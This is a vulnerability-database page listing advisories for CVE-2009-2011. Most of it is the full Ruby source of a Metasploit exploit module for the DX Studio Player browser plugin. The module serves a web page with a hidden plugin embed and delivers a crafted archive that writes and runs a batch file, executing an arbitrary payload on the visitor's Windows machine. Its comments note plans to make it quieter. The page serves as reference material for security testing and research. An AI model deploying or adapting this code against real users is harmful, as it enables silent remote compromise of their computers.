| Reporter | Title | Published | Views | Family All 18 |
|---|---|---|---|---|
| DX Studio Player < 3.0.29.1 Firefox plug-in Command Injection Vuln | 10 Jun 200900:00 | – | zdt | |
| CVE-2009-2011 | 10 Jun 200900:00 | – | circl | |
| DX Studio Player Firefox plug-in command injection | 9 Jun 200900:00 | – | coresecurity | |
| CVE-2009-2011 | 16 Jun 200920:26 | – | cve | |
| CVE-2009-2011 | 16 Jun 200920:26 | – | cvelist | |
| Worldweaver DX Studio Player 3.0.29 - 'shell.execute()' Command Execution (Metasploit) | 26 May 201000:00 | – | exploitdb | |
| Worldweaver DX Studio Player < 3.0.29.1 Firefox plugin - Command Injection | 10 Jun 200900:00 | – | exploitdb | |
| Worldweaver DX Studio Player 3.0.29.1 Firefox plugin - Command Injection | 10 Jun 200900:00 | – | exploitpack | |
| CVE-2009-2011 | 16 Jun 200921:00 | – | nvd | |
| Ubuntu USN-785-1 (ipsec-tools) | 15 Jun 200900:00 | – | openvas |
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'rex/zip'
class MetasploitModule < Msf::Exploit::Remote
Rank = ExcellentRanking
include Msf::Exploit::Remote::HttpServer::HTML
include Msf::Exploit::CmdStager
def initialize(info = {})
super(update_info(info,
'Name' => 'Worldweaver DX Studio Player shell.execute() Command Execution',
'Description' => %q{
This module exploits a command execution vulnerability within the DX
Studio Player from Worldweaver for versions 3.0.29 and earlier. The
player is a browser plugin for IE (ActiveX) and Firefox (dll). When an
unsuspecting user visits a web page referring to a specially crafted
.dxstudio document, an attacker can execute arbitrary commands.
Testing was conducted using plugin version 3.0.29.0 for Firefox 2.0.0.20
and IE 6 on Windows XP SP3. In IE, the user will be prompted if they
wish to allow the plug-in to access local files. This prompt appears to
occur only once per server host.
NOTE: This exploit uses additionally dangerous script features to write
to local files!
},
'License' => MSF_LICENSE,
'Author' => [ 'jduck' ],
'References' =>
[
[ 'CVE', '2009-2011' ],
[ 'BID', '35273' ],
[ 'OSVDB', '54969' ],
[ 'EDB', '8922' ],
[ 'URL', 'http://dxstudio.com/guide.aspx' ]
],
'Payload' =>
{
'Space' => 2048,
},
'Platform' => 'win',
# 'Arch' => ARCH_CMD,
'Targets' =>
[
[ 'Automatic', { } ],
],
'CmdStagerFlavor' => 'vbs',
'DisclosureDate' => '2009-06-09',
'DefaultTarget' => 0))
end
def on_request_uri(cli, request)
url_base = "http://"
url_base += (datastore['SRVHOST'] == '0.0.0.0') ? Rex::Socket.source_address(cli.peerhost) : datastore['SRVHOST']
url_base += ":" + datastore['SRVPORT'].to_s + get_resource()
payload_url = url_base + "/payload"
# handle request for the payload
if (request.uri.match(/payload/))
# build the payload
return if ((p = regenerate_payload(cli)) == nil)
cmds = generate_cmdstager({:linemax => 2047}, p)
scr = ""
cmds.each { |ln|
scr << "f.writeString('"
scr << ln
scr << "\\n');\n"
}
# make header.xml
hdrxml = %Q|<?xml version="1.0"?>
<dxstudio>
<script><![CDATA[function onInit()
{
var f=system.file.openWrite("BATNAME");
f.writeString('@echo off\\n');
CMDS
f.close();
shell.execute("BATNAME");
}]]>
</script>
</dxstudio>
|
hdrxml.gsub!(/CMDS/, scr);
bat_name = rand_text_alphanumeric(rand(32)) + ".bat"
hdrxml.gsub!(/BATNAME/, bat_name);
# craft the zip archive
zip = Rex::Zip::Archive.new
zip.add_file("header.xml", hdrxml)
data = zip.pack
print_status("Sending file.dxstudio payload")
send_response(cli, data, { 'Content-Type' => 'application/octet-stream' })
# Handle the payload
# handler(cli)
return
end
# otherwise, send the html..
html = %Q|<html>
<body>
<div height=100%>
Please wait...
</div>
<object width=1 height=1 classid='clsid:0AC2706C-8623-46F8-9EDD-8F71A897FDAE'>
<param name="src" value="DXURL" />
<embed width=1 height=1 src=DXURL type="application/x-dxstudio">
</embed>
</object>
</body>
</html>
|
print_status("Sending #{self.name} HTML")
# Transmit the compressed response to the client
html.gsub!(/DXURL/, payload_url)
send_response(cli, html, { 'Content-Type' => 'text/html' })
end
end
=begin
TODO:
- make it more quiet
- auto-migrate?
=end
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation